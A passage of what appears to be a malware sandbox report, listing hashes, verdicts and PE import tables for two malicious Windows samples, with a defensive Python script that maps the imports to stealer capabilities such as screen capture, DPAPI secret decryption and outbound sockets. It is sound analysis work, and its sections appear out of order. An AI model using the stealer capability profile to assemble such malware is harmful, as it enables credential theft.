CloseClipboard - 0x4966f0 0x966f0 0x936f0 0x0
ClientToScreen - 0x4966f4 0x966f4 0x936f4 0x0
CheckMenuItem - 0x4966f8 0x966f8 0x936f8 0x0
CallWindowProcA - 0x4966fc 0x966fc 0x936fc 0x0
CallNextHookEx - 0x496700 0x96700 0x93700 0x0
BeginPaint - 0x496704 0x96704 0x93704 0x0
CharNextA - 0x496708 0x96708 0x93708 0x0
CharLowerBuffA - 0x49670c 0x9670c 0x9370c 0x0
CharLowerA - 0x496710 0x96710 0x93710 0x0
CharUpperBuffA - 0x496714 0x96714 0x93714 0x0
CharToOemA - 0x496718 0x96718 0x93718 0x0
AdjustWindowRectEx - 0x49671c 0x9671c 0x9371c 0x0
ActivateKeyboardLayout - 0x496720 0x96720 0x93720 0x0
kernel32.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
Sleep - 0x496728 0x96728 0x93728 0x0
oleaut32.dll (13)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
SafeArrayPtrOfIndex - 0x496730 0x96730 0x93730 0x0
SafeArrayPutElement - 0x496734 0x96734 0x93734 0x0
SafeArrayGetElement - 0x496738 0x96738 0x93738 0x0
SafeArrayUnaccessData - 0x49673c 0x9673c 0x9373c 0x0
SafeArrayAccessData - 0x496740 0x96740 0x93740 0x0
SafeArrayGetUBound - 0x496744 0x96744 0x93744 0x0
SafeArrayGetLBound - 0x496748 0x96748 0x93748 0x0
SafeArrayCreate - 0x49674c 0x9674c 0x9374c 0x0
VariantChangeType - 0x496750 0x96750 0x93750 0x0
VariantCopyInd - 0x496754 0x96754 0x93754 0x0
VariantCopy - 0x496758 0x96758 0x93758 0x0
VariantClear - 0x49675c 0x9675c 0x9375c 0x0
VariantInit - 0x496760 0x96760 0x93760 0x0
ole32.dll (4)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
CoTaskMemAlloc - 0x496768 0x96768 0x93768 0x0
CoCreateInstance - 0x49676c 0x9676c 0x9376c 0x0
CoUninitialize - 0x496770 0x96770 0x93770 0x0
CoInitialize - 0x496774 0x96774 0x93774 0x0
oleaut32.dll (4)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
CreateErrorInfo - 0x49677c 0x9677c 0x9377c 0x0
GetErrorInfo - 0x496780 0x96780 0x93780 0x0
SetErrorInfo - 0x496784 0x96784 0x93784 0x0
SysFreeString - 0x496788 0x96788 0x93788 0x0
comctl32.dll (24)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
ImageList_SetIconSize - 0x496790 0x96790 0x93790 0x0
ImageList_GetIconSize - 0x496794 0x96794 0x93794 0x0
ImageList_Write - 0x496798 0x96798 0x93798 0x0
ImageList_Read - 0x49679c 0x9679c 0x9379c 0x0
ImageList_GetDragImage - 0x4967a0 0x967a0 0x937a0 0x0
ImageList_DragShowNolock - 0x4967a4 0x967a4 0x937a4 0x0
ImageList_SetDragCursorImage - 0x4967a8 0x967a8 0x937a8 0x0
ImageList_DragMove - 0x4967ac 0x967ac 0x937ac 0x0
ImageList_DragLeave - 0x4967b0 0x967b0 0x937b0 0x0
ImageList_DragEnter - 0x4967b4 0x967b4 0x937b4 0x0
ImageList_EndDrag - 0x4967b8 0x967b8 0x937b8 0x0
ImageList_BeginDrag - 0x4967bc 0x967bc 0x937bc 0x0
ImageList_Remove - 0x4967c0 0x967c0 0x937c0 0x0
ImageList_DrawEx - 0x4967c4 0x967c4 0x937c4 0x0
ImageList_Replace - 0x4967c8 0x967c8 0x937c8 0x0
ImageList_Draw - 0x4967cc 0x967cc 0x937cc 0x0
ImageList_GetBkColor - 0x4967d0 0x967d0 0x937d0 0x0
ImageList_SetBkColor - 0x4967d4 0x967d4 0x937d4 0x0
ImageList_ReplaceIcon - 0x4967d8 0x967d8 0x937d8 0x0
ImageList_Add - 0x4967dc 0x967dc 0x937dc 0x0
ImageList_GetImageCount - 0x4967e0 0x967e0 0x937e0 0x0
ImageList_Destroy - 0x4967e4 0x967e4 0x937e4 0x0
ImageList_Create - 0x4967e8 0x967e8 0x937e8 0x0
InitCommonControls - 0x4967ec 0x967ec 0x937ec 0x0
winmm.dll (1)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
sndPlaySoundA - 0x4967f4 0x967f4 0x937f4 0x0
File Name: 94e60de577c84625da69f785ffe7e24c889bfa6923dc7b017c21e8a313e4e8e1
Category: Downloaded File
Type: Binary
Verdict: malicious
Parent File: analysis.pcap
MIME Type: application/vnd.microsoft.portable-executable
File Size: 267.01 KB
MD5: 77be0dd6570301acac3634801676b5d7
SHA1: 7394632d8cfc00c35570d219e49de63076294b6b
SHA256: 94e60de577c84625da69f785ffe7e24c889bfa6923dc7b017c21e8a313e4e8e1
SSDeep: 6144:VMWdTMYHqhElscw4liVM1LDtG8esyh3hNn+:TdTJqWrEVcDYxN+
ImpHash: cb664df5fa904736e15ac44ff006d780
File Reputation Information
Verdict: malicious
AV Matches (1)
Threat Name | Verdict
Trojan.GenericKD.45628116 | malicious
PE Information
Image Base: 0x400000
Entry Point: 0x401480
Size Of Code: 0x35200
Size Of Initialized Data: 0x42800
Size Of Uninitialized Data: 0x600
File Type: FileType.executable
Subsystem: Subsystem.windows_gui
Machine Type: MachineType.i386
Compile Timestamp: 1970-01-01 00:00:00+00:00 (zeroed timestamp field, not the real build date)
Sections (8)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy
.text | 0x401000 | 0x35064 | 0x35200 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.53
.data | 0x437000 | 0x38 | 0x200 | 0x35600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.51
.rdata | 0x438000 | 0x2e68 | 0x3000 | 0x35800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ | 6.83
/4 | 0x43b000 | 0x8fd8 | 0x9000 | 0x38800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ | 4.51
.bss | 0x444000 | 0x440 | 0x0 | 0x0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0
.idata | 0x445000 | 0xea4 | 0x1000 | 0x41800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.98
.CRT | 0x446000 | 0x38 | 0x200 | 0x42800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.34
.tls | 0x447000 | 0x8 | 0x200 | 0x42a00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0
Imports (8)
KERNEL32.dll (9)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
GetCurrentProcess - 0x4452b4 0x450b4 0x418b4 0x1c8
GetCurrentProcessId - 0x4452b8 0x450b8 0x418b8 0x1c9
GetCurrentThreadId - 0x4452bc 0x450bc 0x418bc 0x1cd
GetTickCount - 0x4452c0 0x450c0 0x418c0 0x29b
QueryPerformanceCounter - 0x4452c4 0x450c4 0x418c4 0x3b6
TerminateProcess - 0x4452c8 0x450c8 0x418c8 0x4a7
UnhandledExceptionFilter - 0x4452cc 0x450cc 0x418cc 0x4bb
VirtualProtect - 0x4452d0 0x450d0 0x418d0 0x4dc
VirtualQuery - 0x4452d4 0x450d4 0x418d4 0x4df
msvcrt.dll (29)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
__getmainargs - 0x4452dc 0x450dc 0x418dc 0x3b
__initenv - 0x4452e0 0x450e0 0x418e0 0x3c
__lconv_init - 0x4452e4 0x450e4 0x418e4 0x45
__p__acmdln - 0x4452e8 0x450e8 0x418e8 0x4d
__p__fmode - 0x4452ec 0x450ec 0x418ec 0x54
__set_app_type - 0x4452f0 0x450f0 0x418f0 0x69
__setusermatherr - 0x4452f4 0x450f4 0x418f4 0x6c
_amsg_exit - 0x4452f8 0x450f8 0x418f8 0x91
_cexit - 0x4452fc 0x450fc 0x418fc 0xa2
_fmode - 0x445300 0x45100 0x41900 0x114
_fpreset - 0x445304 0x45104 0x41904 0x118
_initterm - 0x445308 0x45108 0x41908 0x160
_iob - 0x44530c 0x4510c 0x4190c 0x164
_onexit - 0x445310 0x45110 0x41910 0x274
abort - 0x445314 0x45114 0x41914 0x421
calloc - 0x445318 0x45118 0x41918 0x42e
exit - 0x44531c 0x4511c 0x4191c 0x439
fprintf - 0x445320 0x45120 0x41920 0x449
free - 0x445324 0x45124 0x41924 0x450
fwrite - 0x445328 0x45128 0x41928 0x45c
malloc - 0x44532c 0x4512c 0x4192c 0x48b
memcmp - 0x445330 0x45130 0x41930 0x493
memcpy - 0x445334 0x45134 0x41934 0x494
memmove - 0x445338 0x45138 0x41938 0x495
memset - 0x44533c 0x4513c 0x4193c 0x496
signal - 0x445340 0x45140 0x41940 0x4af
strlen - 0x445344 0x45144 0x41944 0x4c3
strncmp - 0x445348 0x45148 0x41948 0x4c6
vfprintf - 0x44534c 0x4514c 0x4194c 0x4e5
WS2_32.dll (13)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
WSACleanup - 0x445354 0x45154 0x41954 0x1b
WSAGetLastError - 0x445358 0x45158 0x41958 0x2c
WSASocketW - 0x44535c 0x4515c 0x4195c 0x54
WSAStartup - 0x445360 0x45160 0x41960 0x55
closesocket - 0x445364 0x45164 0x41964 0x87
connect - 0x445368 0x45168 0x41968 0x88
freeaddrinfo - 0x44536c 0x4516c 0x4196c 0x89
getaddrinfo - 0x445370 0x45170 0x41970 0x8a
ioctlsocket - 0x445374 0x45174 0x41974 0x9c
recv - 0x445378 0x45178 0x41978 0xa0
send - 0x44537c 0x4517c 0x4197c 0xa3
setsockopt - 0x445380 0x45180 0x41980 0xa5
shutdown - 0x445384 0x45184 0x41984 0xa6
ADVAPI32.dll (5)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegCloseKey - 0x44538c 0x4518c 0x4198c 0x235
RegEnumKeyExW - 0x445390 0x45190 0x41990 0x254
RegOpenKeyExW - 0x445394 0x45194 0x41994 0x266
RegQueryInfoKeyW - 0x445398 0x45198 0x41998 0x26d
RegQueryValueExW - 0x44539c 0x4519c 0x4199c 0x273
CRYPT32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CryptUnprotectData - 0x4453a4 0x451a4 0x419a4 0xda
GDI32.dll (7)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
BitBlt - 0x4453ac 0x451ac 0x419ac 0xc
CreateCompatibleDC - 0x4453b0 0x451b0 0x419b0 0x22
CreateDIBSection - 0x4453b4 0x451b4 0x419b4 0x27
DeleteObject - 0x4453b8 0x451b8 0x419b8 0x114
GetCurrentObject - 0x4453bc 0x451bc 0x419bc 0x170
GetObjectW - 0x4453c0 0x451c0 0x419c0 0x19e
SelectObject - 0x4453c4 0x451c4 0x419c4 0x1ff
KERNEL32.dll (50)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CloseHandle - 0x4453cc 0x451cc 0x419cc 0x45
CreateDirectoryW - 0x4453d0 0x451d0 0x419d0 0x6f
CreateFileW - 0x4453d4 0x451d4 0x419d4 0x80
CreateProcessA - 0x4453d8 0x451d8 0x419d8 0x95
CreateToolhelp32Snapshot - 0x4453dc 0x451dc 0x419dc 0xab
DeleteCriticalSection - 0x4453e0 0x451e0 0x419e0 0xbe
DeviceIoControl - 0x4453e4 0x451e4 0x419e4 0xcb
EnterCriticalSection - 0x4453e8 0x451e8 0x419e8 0xdc
FindClose - 0x4453ec 0x451ec 0x419ec 0x11b
FindFirstFileW - 0x4453f0 0x451f0 0x419f0 0x126
FindNextFileW - 0x4453f4 0x451f4 0x419f4 0x132
FormatMessageW - 0x4453f8 0x451f8 0x419f8 0x14d
GetComputerNameW - 0x4453fc 0x451fc 0x419fc 0x17b
GetConsoleMode - 0x445400 0x45200 0x41a00 0x18b
GetEnvironmentVariableW - 0x445404 0x45204 0x41a04 0x1c1
GetFileInformationByHandle - 0x445408 0x45208 0x41a08 0x1cd
GetLastError - 0x44540c 0x4520c 0x41a0c 0x1e6
GetLocaleInfoW - 0x445410 0x45210 0x41a10 0x1ea
GetModuleFileNameW - 0x445414 0x45214 0x41a14 0x1f9
GetModuleHandleW - 0x445418 0x45218 0x41a18 0x1fd
GetProcAddress - 0x44541c 0x4521c 0x41a1c 0x231
GetProcessHeap - 0x445420 0x45220 0x41a20 0x237
GetStartupInfoA - 0x445424 0x45224 0x41a24 0x252
GetStdHandle - 0x445428 0x45228 0x41a28 0x255
GetSystemInfo - 0x44542c 0x4522c 0x41a2c 0x266
GetSystemTimeAsFileTime - 0x445430 0x45230 0x41a30 0x26c
GetTempPathW - 0x445434 0x45234 0x41a34 0x279
GetTimeZoneInformation - 0x445438 0x45238 0x41a38 0x28f
GetUserDefaultLocaleName - 0x44543c 0x4523c 0x41a3c 0x295
GlobalMemoryStatusEx - 0x445440 0x45240 0x41a40 0x2ba
HeapAlloc - 0x445444 0x45244 0x41a44 0x2c5
HeapFree - 0x445448 0x45248 0x41a48 0x2c9
HeapReAlloc - 0x44544c 0x4524c 0x41a4c 0x2cc
InitializeCriticalSection - 0x445450 0x45250 0x41a50 0x2da
LeaveCriticalSection - 0x445454 0x45254 0x41a54 0x329
LoadLibraryA - 0x445458 0x45258 0x41a58 0x32d
LocalFree - 0x44545c 0x4525c 0x41a5c 0x33a
Process32First - 0x445460 0x45260 0x41a60 0x387
Process32Next - 0x445464 0x45264 0x41a64 0x389
ReadFile - 0x445468 0x45268 0x41a68 0x3c0
SetFilePointerEx - 0x44546c 0x4526c 0x41a6c 0x430
SetHandleInformation - 0x445470 0x45270 0x41a70 0x43a
SetLastError - 0x445474 0x45274 0x41a74 0x43d
SetUnhandledExceptionFilter - 0x445478 0x45278 0x41a78 0x476
Sleep - 0x44547c 0x4527c 0x41a7c 0x483
TlsAlloc - 0x445480 0x45280 0x41a80 0x494
TlsGetValue - 0x445484 0x45284 0x41a84 0x496
TlsSetValue - 0x445488 0x45288 0x41a88 0x497
WriteConsoleW - 0x44548c 0x4528c 0x41a8c 0x4f2
WriteFile - 0x445490 0x45290 0x41a90 0x4f3
USER32.dll (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
EnumDisplayDevicesW - 0x445498 0x45298 0x41a98 0xce
GetDC - 0x44549c 0x4529c 0x41a9c 0x10c
GetDesktopWindow - 0x4454a0 0x452a0 0x41aa0 0x10e
GetKeyboardLayoutList - 0x4454a4 0x452a4 0x41aa4 0x12e
GetSystemMetrics - 0x4454a8 0x452a8 0x41aa8 0x17c
GetWindowRect - 0x4454ac 0x452ac 0x41aac 0x199
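The import table above is the quickest static signal an analyst gets before the sandbox trace is read: WS2_32 socket calls, CryptUnprotectData (DPAPI), the GDI32/USER32 screenshot primitives, Toolhelp32 process enumeration and registry enumeration together sketch a recon/stealer profile. The script below is an added example, not VMRay's code and not the sample's own logic: it transcribes the API names from the table above (IAT addresses and hints dropped, since they do not matter for triage) and matches them against capability buckets that fire only when every API in the bucket is present, so a lone `Sleep` or `ReadFile` never lights anything up. The bucket definitions are the author's own assumptions; an import proves only that the code can reach the API, not that the path is executed.

```python
"""Import-table capability triage.

Added example (not VMRay's code). Groups API names from the report's import
table above into capability buckets. Imports hint at capability; they do not
prove the code path runs. Bucket definitions are this example's assumptions.
"""

# Transcribed from the import table above for the first PE in the report.
REPORTED_IMPORTS = {
    "WS2_32.dll": ["WSACleanup", "WSAGetLastError", "WSASocketW", "WSAStartup",
                   "closesocket", "connect", "freeaddrinfo", "getaddrinfo",
                   "ioctlsocket", "recv", "send", "setsockopt", "shutdown"],
    "ADVAPI32.dll": ["RegCloseKey", "RegEnumKeyExW", "RegOpenKeyExW",
                     "RegQueryInfoKeyW", "RegQueryValueExW"],
    "CRYPT32.dll": ["CryptUnprotectData"],
    "GDI32.dll": ["BitBlt", "CreateCompatibleDC", "CreateDIBSection",
                  "DeleteObject", "GetCurrentObject", "GetObjectW", "SelectObject"],
    "KERNEL32.dll": ["CreateProcessA", "CreateToolhelp32Snapshot", "Process32First",
                     "Process32Next", "GetComputerNameW", "GetLocaleInfoW",
                     "GetUserDefaultLocaleName", "GetTimeZoneInformation",
                     "GlobalMemoryStatusEx", "GetSystemInfo", "FindFirstFileW",
                     "FindNextFileW", "GetTempPathW", "LoadLibraryA", "GetProcAddress",
                     "DeviceIoControl", "Sleep", "ReadFile", "WriteFile"],
    "USER32.dll": ["EnumDisplayDevicesW", "GetDC", "GetDesktopWindow",
                   "GetKeyboardLayoutList", "GetSystemMetrics", "GetWindowRect"],
}

# A bucket fires only when ALL of its APIs are imported (assumed groupings).
CAPABILITY_SIGNATURES = {
    "screen capture": {"GetDesktopWindow", "GetDC", "CreateCompatibleDC",
                       "CreateDIBSection", "SelectObject", "BitBlt"},
    "DPAPI secret decryption": {"CryptUnprotectData"},
    "outbound TCP (raw sockets)": {"WSAStartup", "getaddrinfo", "connect", "send", "recv"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "registry enumeration": {"RegOpenKeyExW", "RegEnumKeyExW", "RegQueryValueExW"},
    "host fingerprinting": {"GetComputerNameW", "GetLocaleInfoW", "GetSystemInfo",
                            "GlobalMemoryStatusEx", "GetKeyboardLayoutList"},
    "dynamic API resolution": {"LoadLibraryA", "GetProcAddress"},
    "child process creation": {"CreateProcessA"},
}


def flatten(imports):
    """Collapse a {dll: [api, ...]} table into one set of API names."""
    return {api for apis in imports.values() for api in apis}


def triage(imports):
    """Return {capability: sorted APIs} for every bucket fully covered by imports."""
    present = flatten(imports)
    return {name: sorted(needed)
            for name, needed in CAPABILITY_SIGNATURES.items() if needed <= present}


def coverage(imports):
    """Fraction of each bucket present; useful to spot partially stripped IATs."""
    present = flatten(imports)
    return {name: len(needed & present) / len(needed)
            for name, needed in CAPABILITY_SIGNATURES.items()}


def missing_for(imports, capability):
    """APIs a bucket still lacks; empty list means the bucket fires."""
    return sorted(CAPABILITY_SIGNATURES[capability] - flatten(imports))


if __name__ == "__main__":
    for cap, apis in triage(REPORTED_IMPORTS).items():
        print(f"{cap}: {', '.join(apis)}")
```

When only part of a bucket is present (a common sight with packed or resolve-at-runtime samples, where `LoadLibraryA`/`GetProcAddress` survive but the interesting names do not), `coverage()` shows how far from a full match the table is and `missing_for()` names the gap.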
jax.k Embedded File Binary
malicious
Parent File C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
MIME Type application/vnd.microsoft.portable-executable
File Size 704.17 KB
MD5 2ea3c764946a151f65efbbbb2ee2f969
SHA1 9957006c9ccbd8960fb57c264cf666e234a8c2d0
SHA256 9ce6c2ffdc33040c55cbc1ead970415494022a154b02cee02aded3727faf79d6
SSDeep 12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1agZ:HKHaY8k5faaboEy6r8zz1B
ImpHash 976cbee04383163867f763148191e313
AV Matches (1)
Threat Name Verdict
Gen:Variant.Jacard.222844
malicious
PE Information
Image Base 0x400000
Entry Point 0x492348
Size Of Code 0x91400
Size Of Initialized Data 0x1e800
File Type DLL
Subsystem Windows GUI
Machine Type i386
Compile Timestamp 1992-06-19 22:22:17+00:00
Sections (6)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
CODE 0x401000 0x91368 0x91400 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.52
DATA 0x493000 0x17a4 0x1800 0x91800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.33
BSS 0x495000 0xd25 0x0 0x93000 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.idata 0x496000 0x244a 0x2600 0x93000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.79
.reloc 0x499000 0xa918 0xaa00 0x95600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ 6.62
.rsrc 0x4a4000 0x10000 0x10000 0xa0000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ 6.15
Imports (16)
kernel32.dll (34)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DeleteCriticalSection - 0x496154 0x96154 0x93154 0x0
LeaveCriticalSection - 0x496158 0x96158 0x93158 0x0
EnterCriticalSection - 0x49615c 0x9615c 0x9315c 0x0
InitializeCriticalSection - 0x496160 0x96160 0x93160 0x0
VirtualFree - 0x496164 0x96164 0x93164 0x0
VirtualAlloc - 0x496168 0x96168 0x93168 0x0
LocalFree - 0x49616c 0x9616c 0x9316c 0x0
LocalAlloc - 0x496170 0x96170 0x93170 0x0
GetVersion - 0x496174 0x96174 0x93174 0x0
GetCurrentThreadId - 0x496178 0x96178 0x93178 0x0
InterlockedDecrement - 0x49617c 0x9617c 0x9317c 0x0
InterlockedIncrement - 0x496180 0x96180 0x93180 0x0
VirtualQuery - 0x496184 0x96184 0x93184 0x0
WideCharToMultiByte - 0x496188 0x96188 0x93188 0x0
MultiByteToWideChar - 0x49618c 0x9618c 0x9318c 0x0
lstrlenA - 0x496190 0x96190 0x93190 0x0
lstrcpynA - 0x496194 0x96194 0x93194 0x0
LoadLibraryExA - 0x496198 0x96198 0x93198 0x0
GetThreadLocale - 0x49619c 0x9619c 0x9319c 0x0
GetStartupInfoA - 0x4961a0 0x961a0 0x931a0 0x0
GetProcAddress - 0x4961a4 0x961a4 0x931a4 0x0
GetModuleHandleA - 0x4961a8 0x961a8 0x931a8 0x0
GetModuleFileNameA - 0x4961ac 0x961ac 0x931ac 0x0
GetLocaleInfoA - 0x4961b0 0x961b0 0x931b0 0x0
GetCommandLineA - 0x4961b4 0x961b4 0x931b4 0x0
FreeLibrary - 0x4961b8 0x961b8 0x931b8 0x0
FindFirstFileA - 0x4961bc 0x961bc 0x931bc 0x0
FindClose - 0x4961c0 0x961c0 0x931c0 0x0
ExitProcess - 0x4961c4 0x961c4 0x931c4 0x0
WriteFile - 0x4961c8 0x961c8 0x931c8 0x0
UnhandledExceptionFilter - 0x4961cc 0x961cc 0x931cc 0x0
RtlUnwind - 0x4961d0 0x961d0 0x931d0 0x0
RaiseException - 0x4961d4 0x961d4 0x931d4 0x0
GetStdHandle - 0x4961d8 0x961d8 0x931d8 0x0
user32.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetKeyboardType - 0x4961e0 0x961e0 0x931e0 0x0
LoadStringA - 0x4961e4 0x961e4 0x931e4 0x0
MessageBoxA - 0x4961e8 0x961e8 0x931e8 0x0
CharNextA - 0x4961ec 0x961ec 0x931ec 0x0
advapi32.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegQueryValueExA - 0x4961f4 0x961f4 0x931f4 0x0
RegOpenKeyExA - 0x4961f8 0x961f8 0x931f8 0x0
RegCloseKey - 0x4961fc 0x961fc 0x931fc 0x0
oleaut32.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysFreeString - 0x496204 0x96204 0x93204 0x0
SysReAllocStringLen - 0x496208 0x96208 0x93208 0x0
SysAllocStringLen - 0x49620c 0x9620c 0x9320c 0x0
kernel32.dll (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
TlsSetValue - 0x496214 0x96214 0x93214 0x0
TlsGetValue - 0x496218 0x96218 0x93218 0x0
TlsFree - 0x49621c 0x9621c 0x9321c 0x0
TlsAlloc - 0x496220 0x96220 0x93220 0x0
LocalFree - 0x496224 0x96224 0x93224 0x0
LocalAlloc - 0x496228 0x96228 0x93228 0x0
advapi32.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegQueryValueExA - 0x496230 0x96230 0x93230 0x0
RegOpenKeyExA - 0x496234 0x96234 0x93234 0x0
RegCloseKey - 0x496238 0x96238 0x93238 0x0
kernel32.dll (69)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrcpyA - 0x496240 0x96240 0x93240 0x0
lstrcmpA - 0x496244 0x96244 0x93244 0x0
WriteFile - 0x496248 0x96248 0x93248 0x0
WaitForSingleObject - 0x49624c 0x9624c 0x9324c 0x0
VirtualQuery - 0x496250 0x96250 0x93250 0x0
VirtualAlloc - 0x496254 0x96254 0x93254 0x0
Sleep - 0x496258 0x96258 0x93258 0x0
SizeofResource - 0x49625c 0x9625c 0x9325c 0x0
SetThreadLocale - 0x496260 0x96260 0x93260 0x0
SetFilePointer - 0x496264 0x96264 0x93264 0x0
SetEvent - 0x496268 0x96268 0x93268 0x0
SetErrorMode - 0x49626c 0x9626c 0x9326c 0x0
SetEndOfFile - 0x496270 0x96270 0x93270 0x0
ResetEvent - 0x496274 0x96274 0x93274 0x0
ReadFile - 0x496278 0x96278 0x93278 0x0
MultiByteToWideChar - 0x49627c 0x9627c 0x9327c 0x0
MulDiv - 0x496280 0x96280 0x93280 0x0
LockResource - 0x496284 0x96284 0x93284 0x0
LoadResource - 0x496288 0x96288 0x93288 0x0
LoadLibraryA - 0x49628c 0x9628c 0x9328c 0x0
LeaveCriticalSection - 0x496290 0x96290 0x93290 0x0
InitializeCriticalSection - 0x496294 0x96294 0x93294 0x0
